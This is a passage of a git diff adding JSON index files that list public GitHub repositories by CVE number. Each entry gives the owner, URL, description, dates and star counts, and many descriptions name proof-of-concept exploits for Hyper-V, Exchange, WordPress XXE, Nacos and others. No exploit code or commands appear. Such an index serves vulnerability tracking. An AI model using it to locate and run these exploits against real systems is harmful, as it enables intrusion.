"user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rafael-Svechinskaya\/IOC_for_CVE-2021-28310", + "description": "Malicious Payloads that abuses Win32k Elevation of Privilege Vulnerability (CVE-2021-28310)", + "fork": false, + "created_at": "2021-04-14T06:36:40Z", + "updated_at": "2022-10-15T14:05:58Z", + "pushed_at": "2021-04-14T07:16:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-28312.json b/2021/CVE-2021-28312.json new file mode 100644 index 0000000000..2dbe8f9c2f --- /dev/null +++ b/2021/CVE-2021-28312.json @@ -0,0 +1,33 @@ +[ + { + "id": 365343703, + "name": "CVE-2021-28312", + "full_name": "shubham0d\/CVE-2021-28312", + "owner": { + "login": "shubham0d", + "id": 12750163, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12750163?v=4", + "html_url": "https:\/\/github.com\/shubham0d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shubham0d\/CVE-2021-28312", + "description": "POC and description for CVE-2021-28312", + "fork": false, + "created_at": "2021-05-07T20:16:22Z", + "updated_at": "2024-08-12T20:12:48Z", + "pushed_at": "2021-05-07T20:31:12Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-28378.json b/2021/CVE-2021-28378.json new file mode 100644 index 0000000000..426053f50c --- /dev/null +++ b/2021/CVE-2021-28378.json @@ -0,0 +1,33 @@ +[ + { + "id": 391631988, + "name": "CVE-2021-28378", + "full_name": "pandatix\/CVE-2021-28378", + "owner": { + "login": "pandatix", + "id": 57038071, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57038071?v=4", + "html_url": "https:\/\/github.com\/pandatix", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pandatix\/CVE-2021-28378", + "description": null, + "fork": false, + "created_at": "2021-08-01T13:16:53Z", + "updated_at": "2022-02-28T14:22:43Z", + "pushed_at": "2021-08-07T14:28:09Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-28476.json b/2021/CVE-2021-28476.json new file mode 100644 index 0000000000..2eb1d1fb6d --- /dev/null +++ b/2021/CVE-2021-28476.json @@ -0,0 +1,196 @@ +[ + { + "id": 372590733, + "name": "CVE-2021-28476", + "full_name": "0vercl0k\/CVE-2021-28476", + "owner": { + "login": "0vercl0k", + "id": 1476421, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1476421?v=4", + "html_url": "https:\/\/github.com\/0vercl0k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0vercl0k\/CVE-2021-28476", + "description": "PoC for CVE-2021-28476 a guest-to-host \"Hyper-V Remote Code Execution Vulnerability\" in vmswitch.sys.", + "fork": false, + "created_at": "2021-05-31T18:02:39Z", + "updated_at": "2024-10-26T16:47:30Z", + "pushed_at": "2021-06-01T15:08:23Z", + "stargazers_count": 218, + "watchers_count": 218, + "has_discussions": false, + "forks_count": 37, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-28476", + "guest-to-host", + "hyper-v", + "network-service-provider", + "nvsp", + "rndis", + "vmswitch" + ], + "visibility": "public", + "forks": 37, + "watchers": 218, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 373204692, + "name": "CVE-2021-28476", + "full_name": "bluefrostsecurity\/CVE-2021-28476", + "owner": { + "login": "bluefrostsecurity", + "id": 4976074, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4976074?v=4", + "html_url": "https:\/\/github.com\/bluefrostsecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bluefrostsecurity\/CVE-2021-28476", + "description": null, + "fork": false, + "created_at": "2021-06-02T14:50:56Z", + "updated_at": "2024-04-02T17:49:39Z", + "pushed_at": "2021-06-02T14:54:14Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 396338187, + "name": "CVE-2021-28476-tools-env", + "full_name": "LaCeeKa\/CVE-2021-28476-tools-env", + "owner": { + "login": "LaCeeKa", + "id": 88970302, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88970302?v=4", + "html_url": "https:\/\/github.com\/LaCeeKa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LaCeeKa\/CVE-2021-28476-tools-env", + "description": "tools for automate configure Ubuntu 20.04 enviroment for testing CVE-2021-28476.", + "fork": false, + "created_at": "2021-08-15T12:06:44Z", + "updated_at": "2024-10-26T16:43:59Z", + "pushed_at": "2021-08-15T11:44:02Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 448441625, + "name": "CVE-2021-28476", + "full_name": "australeo\/CVE-2021-28476", + "owner": { + "login": "australeo", + "id": 47684814, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47684814?v=4", + "html_url": "https:\/\/github.com\/australeo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/australeo\/CVE-2021-28476", + "description": "CVE-2021-28476: Hyper-V vmswitch.sys arbitrary pointer dereference from guest VM", + "fork": false, + "created_at": "2022-01-16T02:45:26Z", + "updated_at": "2023-01-20T10:49:14Z", + "pushed_at": "2022-01-16T02:46:22Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 471563181, + "name": "0vercl0k", + "full_name": "2273852279qqs\/0vercl0k", + "owner": { + "login": "2273852279qqs", + "id": 101910961, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101910961?v=4", + "html_url": "https:\/\/github.com\/2273852279qqs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/2273852279qqs\/0vercl0k", + "description": "PoC for CVE-2021-28476 a guest-to-host \"Hyper-V Remote Code Execution Vulnerability\" in vmswitch.sys.", + "fork": false, + "created_at": "2022-03-19T01:33:04Z", + "updated_at": "2022-03-19T01:33:04Z", + "pushed_at": "2022-03-19T01:33:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 482583152, + "name": "0vercl0k", + "full_name": "dengyang123x\/0vercl0k", + "owner": { + "login": "dengyang123x", + "id": 103896519, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103896519?v=4", + "html_url": "https:\/\/github.com\/dengyang123x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dengyang123x\/0vercl0k", + "description": "PoC for CVE-2021-28476 a guest-to-host \"Hyper-V Remote Code Execution Vulnerability\" in vmswitch.sys.", + "fork": false, + "created_at": "2022-04-17T17:00:49Z", + "updated_at": "2022-05-31T07:42:57Z", + "pushed_at": "2022-04-17T17:00:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-28480.json b/2021/CVE-2021-28480.json new file mode 100644 index 0000000000..7df0590c1e --- /dev/null +++ b/2021/CVE-2021-28480.json @@ -0,0 +1,64 @@ +[ + { + "id": 360116407, + "name": "CVE-2021-28480_HoneyPoC3", + "full_name": "ZephrFish\/CVE-2021-28480_HoneyPoC3", + "owner": { + "login": "ZephrFish", + "id": 5783068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5783068?v=4", + "html_url": "https:\/\/github.com\/ZephrFish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZephrFish\/CVE-2021-28480_HoneyPoC3", + "description": "DO NOT RUN THIS.", + "fork": false, + "created_at": "2021-04-21T09:50:39Z", + "updated_at": "2024-08-12T20:12:21Z", + "pushed_at": "2021-07-15T01:41:13Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 475777282, + "name": "CVE-2021-28480", + "full_name": "Threonic\/CVE-2021-28480", + "owner": { + "login": "Threonic", + "id": 49891027, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49891027?v=4", + "html_url": "https:\/\/github.com\/Threonic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Threonic\/CVE-2021-28480", + "description": null, + "fork": false, + "created_at": "2022-03-30T07:57:43Z", + "updated_at": "2022-03-30T07:57:43Z", + "pushed_at": "2022-03-30T07:57:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-28482.json b/2021/CVE-2021-28482.json new file mode 100644 index 0000000000..9da41f28c8 --- /dev/null +++ b/2021/CVE-2021-28482.json @@ -0,0 +1,64 @@ +[ + { + "id": 363946586, + "name": "CVE-2021-28482-Exchange-POC", + "full_name": "Shadow0ps\/CVE-2021-28482-Exchange-POC", + "owner": { + "login": "Shadow0ps", + "id": 6516174, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6516174?v=4", + "html_url": "https:\/\/github.com\/Shadow0ps", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Shadow0ps\/CVE-2021-28482-Exchange-POC", + "description": "POC from TestANull for CVE-2021-28482 on Exchange Server", + "fork": false, + "created_at": "2021-05-03T13:54:36Z", + "updated_at": "2024-08-12T20:12:41Z", + "pushed_at": "2021-05-03T14:29:49Z", + "stargazers_count": 45, + "watchers_count": 45, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 45, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 369452613, + "name": "CVE-2021-28482_Exploit", + "full_name": "KevinWorst\/CVE-2021-28482_Exploit", + "owner": { + "login": "KevinWorst", + "id": 84563225, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84563225?v=4", + "html_url": "https:\/\/github.com\/KevinWorst", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KevinWorst\/CVE-2021-28482_Exploit", + "description": null, + "fork": false, + "created_at": "2021-05-21T07:34:46Z", + "updated_at": "2021-06-30T06:41:38Z", + "pushed_at": "2021-05-22T00:19:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-28663.json b/2021/CVE-2021-28663.json new file mode 100644 index 0000000000..be40a136ab --- /dev/null +++ b/2021/CVE-2021-28663.json @@ -0,0 +1,33 @@ +[ + { + "id": 402225063, + "name": "CVE-2021-28663", + "full_name": "lntrx\/CVE-2021-28663", + "owner": { + "login": "lntrx", + "id": 37024183, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37024183?v=4", + "html_url": "https:\/\/github.com\/lntrx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lntrx\/CVE-2021-28663", + "description": "A basic PoC leak for CVE-2021-28663 (Internal of the Android kernel backdoor vulnerability)", + "fork": false, + "created_at": "2021-09-01T22:59:29Z", + "updated_at": "2024-09-27T13:46:37Z", + "pushed_at": "2021-09-03T10:24:34Z", + "stargazers_count": 116, + "watchers_count": 116, + "has_discussions": false, + "forks_count": 26, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 26, + "watchers": 116, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-29002.json b/2021/CVE-2021-29002.json new file mode 100644 index 0000000000..b2e0c67cb8 --- /dev/null +++ b/2021/CVE-2021-29002.json @@ -0,0 +1,33 @@ +[ + { + "id": 786354845, + "name": "CVE-2021-29002-1", + "full_name": "miguelc49\/CVE-2021-29002-1", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2021-29002-1", + "description": null, + "fork": false, + "created_at": "2024-04-14T07:39:45Z", + "updated_at": "2024-04-14T17:38:39Z", + "pushed_at": "2024-04-14T17:38:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-29003.json b/2021/CVE-2021-29003.json new file mode 100644 index 0000000000..32ac674b1c --- /dev/null +++ b/2021/CVE-2021-29003.json @@ -0,0 +1,33 @@ +[ + { + "id": 406636028, + "name": "CVE-2021-29003", + "full_name": "jaysharma786\/CVE-2021-29003", + "owner": { + "login": "jaysharma786", + "id": 46397588, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46397588?v=4", + "html_url": "https:\/\/github.com\/jaysharma786", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jaysharma786\/CVE-2021-29003", + "description": null, + "fork": false, + "created_at": "2021-09-15T06:14:47Z", + "updated_at": "2023-08-25T13:03:00Z", + "pushed_at": "2023-08-25T13:03:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-29155.json b/2021/CVE-2021-29155.json new file mode 100644 index 0000000000..0b73c6c2a5 --- /dev/null +++ b/2021/CVE-2021-29155.json @@ -0,0 +1,33 @@ +[ + { + "id": 373563220, + "name": "CVE-2021-29155", + "full_name": "benschlueter\/CVE-2021-29155", + "owner": { + "login": "benschlueter", + "id": 25753058, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25753058?v=4", + "html_url": "https:\/\/github.com\/benschlueter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/benschlueter\/CVE-2021-29155", + "description": "Proof of Concept CVE-2021-29155 ", + "fork": false, + "created_at": "2021-06-03T15:53:10Z", + "updated_at": "2023-01-12T12:21:22Z", + "pushed_at": "2021-06-04T16:59:22Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-29156.json b/2021/CVE-2021-29156.json new file mode 100644 index 0000000000..fdda304385 --- /dev/null +++ b/2021/CVE-2021-29156.json @@ -0,0 +1,64 @@ +[ + { + "id": 424232146, + "name": "CVE-2021-29156", + "full_name": "guidepointsecurity\/CVE-2021-29156", + "owner": { + "login": "guidepointsecurity", + "id": 9867431, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9867431?v=4", + "html_url": "https:\/\/github.com\/guidepointsecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/guidepointsecurity\/CVE-2021-29156", + "description": "Proof-of-Concept tool for CVE-2021-29156, an LDAP injection vulnerability in ForgeRock OpenAM v13.0.0.", + "fork": false, + "created_at": "2021-11-03T13:21:50Z", + "updated_at": "2023-09-12T13:41:31Z", + "pushed_at": "2022-11-17T21:03:28Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 3, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 547217442, + "name": "CVE-2021-29156", + "full_name": "5amu\/CVE-2021-29156", + "owner": { + "login": "5amu", + "id": 39925709, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39925709?v=4", + "html_url": "https:\/\/github.com\/5amu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/5amu\/CVE-2021-29156", + "description": "Exploit for CVE-2021-29156", + "fork": false, + "created_at": "2022-10-07T10:18:44Z", + "updated_at": "2024-08-12T20:27:36Z", + "pushed_at": "2022-10-08T19:19:43Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-29200.json b/2021/CVE-2021-29200.json new file mode 100644 index 0000000000..462a9561dc --- /dev/null +++ b/2021/CVE-2021-29200.json @@ -0,0 +1,33 @@ +[ + { + "id": 366379721, + "name": "CVE-2021-29200", + "full_name": "freeide\/CVE-2021-29200", + "owner": { + "login": "freeide", + "id": 33774184, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33774184?v=4", + "html_url": "https:\/\/github.com\/freeide", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/freeide\/CVE-2021-29200", + "description": null, + "fork": false, + "created_at": "2021-05-11T12:48:19Z", + "updated_at": "2021-05-11T12:48:20Z", + "pushed_at": "2021-05-11T10:42:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-29267.json b/2021/CVE-2021-29267.json new file mode 100644 index 0000000000..0bfb11c61d --- /dev/null +++ b/2021/CVE-2021-29267.json @@ -0,0 +1,33 @@ +[ + { + "id": 352641545, + "name": "CVE-2021-29267", + "full_name": "Security-AVS\/CVE-2021-29267", + "owner": { + "login": "Security-AVS", + "id": 72926885, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72926885?v=4", + "html_url": "https:\/\/github.com\/Security-AVS", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Security-AVS\/CVE-2021-29267", + "description": "SherlockIM ChatBot XSS", + "fork": false, + "created_at": "2021-03-29T12:50:23Z", + "updated_at": "2021-04-29T02:57:57Z", + "pushed_at": "2021-03-29T12:53:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-29337.json b/2021/CVE-2021-29337.json new file mode 100644 index 0000000000..0e7f7c2c82 --- /dev/null +++ b/2021/CVE-2021-29337.json @@ -0,0 +1,33 @@ +[ + { + "id": 378779650, + "name": "CVE-2021-29337", + "full_name": "rjt-gupta\/CVE-2021-29337", + "owner": { + "login": "rjt-gupta", + "id": 35985127, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35985127?v=4", + "html_url": "https:\/\/github.com\/rjt-gupta", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rjt-gupta\/CVE-2021-29337", + "description": "CVE-2021-29337 - Privilege Escalation in MODAPI.sys (MSI Dragon Center)", + "fork": false, + "created_at": "2021-06-21T01:59:58Z", + "updated_at": "2024-01-13T11:15:44Z", + "pushed_at": "2021-10-12T12:03:20Z", + "stargazers_count": 29, + "watchers_count": 29, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 29, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-29349.json b/2021/CVE-2021-29349.json new file mode 100644 index 0000000000..7d7746ffc9 --- /dev/null +++ b/2021/CVE-2021-29349.json @@ -0,0 +1,64 @@ +[ + { + "id": 353469792, + "name": "CVE-2021-29349", + "full_name": "0xBaz\/CVE-2021-29349", + "owner": { + "login": "0xBaz", + "id": 80262250, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80262250?v=4", + "html_url": "https:\/\/github.com\/0xBaz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xBaz\/CVE-2021-29349", + "description": null, + "fork": false, + "created_at": "2021-03-31T19:36:29Z", + "updated_at": "2021-05-22T11:00:46Z", + "pushed_at": "2021-03-31T19:36:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 358957574, + "name": "CVE-2021-29349", + "full_name": "Vulnmachines\/CVE-2021-29349", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/CVE-2021-29349", + "description": "CVE-2021-29349 CSRF to remove all messages in Mahara 20.10", + "fork": false, + "created_at": "2021-04-17T18:48:38Z", + "updated_at": "2024-08-12T20:12:15Z", + "pushed_at": "2021-04-17T18:54:48Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-29440.json b/2021/CVE-2021-29440.json new file mode 100644 index 0000000000..767f979b14 --- /dev/null +++ b/2021/CVE-2021-29440.json @@ -0,0 +1,33 @@ +[ + { + "id": 374239784, + "name": "CVE-2021-29440", + "full_name": "CsEnox\/CVE-2021-29440", + "owner": { + "login": "CsEnox", + "id": 60170196, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60170196?v=4", + "html_url": "https:\/\/github.com\/CsEnox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CsEnox\/CVE-2021-29440", + "description": "Unsafe Twig processing of static pages leading to RCE in Grav CMS 1.7.10", + "fork": false, + "created_at": "2021-06-06T00:51:21Z", + "updated_at": "2024-08-12T20:13:39Z", + "pushed_at": "2021-06-06T03:42:17Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-29441.json b/2021/CVE-2021-29441.json new file mode 100644 index 0000000000..de3832d6b4 --- /dev/null +++ b/2021/CVE-2021-29441.json @@ -0,0 +1,64 @@ +[ + { + "id": 413725319, + "name": "nacos-cve-2021-29441", + "full_name": "hh-hunter\/nacos-cve-2021-29441", + "owner": { + "login": "hh-hunter", + "id": 91593280, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91593280?v=4", + "html_url": "https:\/\/github.com\/hh-hunter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hh-hunter\/nacos-cve-2021-29441", + "description": null, + "fork": false, + "created_at": "2021-10-05T07:59:05Z", + "updated_at": "2021-10-05T07:59:17Z", + "pushed_at": "2021-10-05T07:59:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 470076597, + "name": "CVE-2021-29441", + "full_name": "bysinks\/CVE-2021-29441", + "owner": { + "login": "bysinks", + "id": 50199185, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50199185?v=4", + "html_url": "https:\/\/github.com\/bysinks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bysinks\/CVE-2021-29441", + "description": null, + "fork": false, + "created_at": "2022-03-15T08:53:59Z", + "updated_at": "2024-05-20T00:42:46Z", + "pushed_at": "2022-03-15T08:56:39Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-29442.json b/2021/CVE-2021-29442.json new file mode 100644 index 0000000000..a254706338 --- /dev/null +++ b/2021/CVE-2021-29442.json @@ -0,0 +1,64 @@ +[ + { + "id": 836045735, + "name": "QVD-2024-26473", + "full_name": "VictorShem\/QVD-2024-26473", + "owner": { + "login": "VictorShem", + "id": 106722243, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106722243?v=4", + "html_url": "https:\/\/github.com\/VictorShem", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/VictorShem\/QVD-2024-26473", + "description": "QVD-2024-26473 && CVE-2021-29442", + "fork": false, + "created_at": "2024-07-31T03:56:30Z", + "updated_at": "2024-07-31T04:25:52Z", + "pushed_at": "2024-07-31T04:12:00Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892369638, + "name": "cve-2021-29442-Nacos-Derby-rce-exp", + "full_name": "XiaomingX\/cve-2021-29442-Nacos-Derby-rce-exp", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2021-29442-Nacos-Derby-rce-exp", + "description": "Nacos Derby命令执行漏洞利用脚本", + "fork": false, + "created_at": "2024-11-22T01:32:37Z", + "updated_at": "2024-11-27T16:18:12Z", + "pushed_at": "2024-11-22T01:33:26Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-29447.json b/2021/CVE-2021-29447.json new file mode 100644 index 0000000000..1d9cf0e43f --- /dev/null +++ b/2021/CVE-2021-29447.json @@ -0,0 +1,490 @@ +[ + { + "id": 358714819, + "name": "CVE-2021-29447", + "full_name": "motikan2010\/CVE-2021-29447", + "owner": { + "login": "motikan2010", + "id": 3177297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3177297?v=4", + "html_url": "https:\/\/github.com\/motikan2010", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/motikan2010\/CVE-2021-29447", + "description": "WordPress - Authenticated XXE (CVE-2021-29447)", + "fork": false, + "created_at": "2021-04-16T20:41:26Z", + "updated_at": "2024-10-10T07:23:13Z", + "pushed_at": "2021-10-04T01:13:54Z", + "stargazers_count": 42, + "watchers_count": 42, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 42, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 370069665, + "name": "wordpress_cve-2021-29447", + "full_name": "Vulnmachines\/wordpress_cve-2021-29447", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": 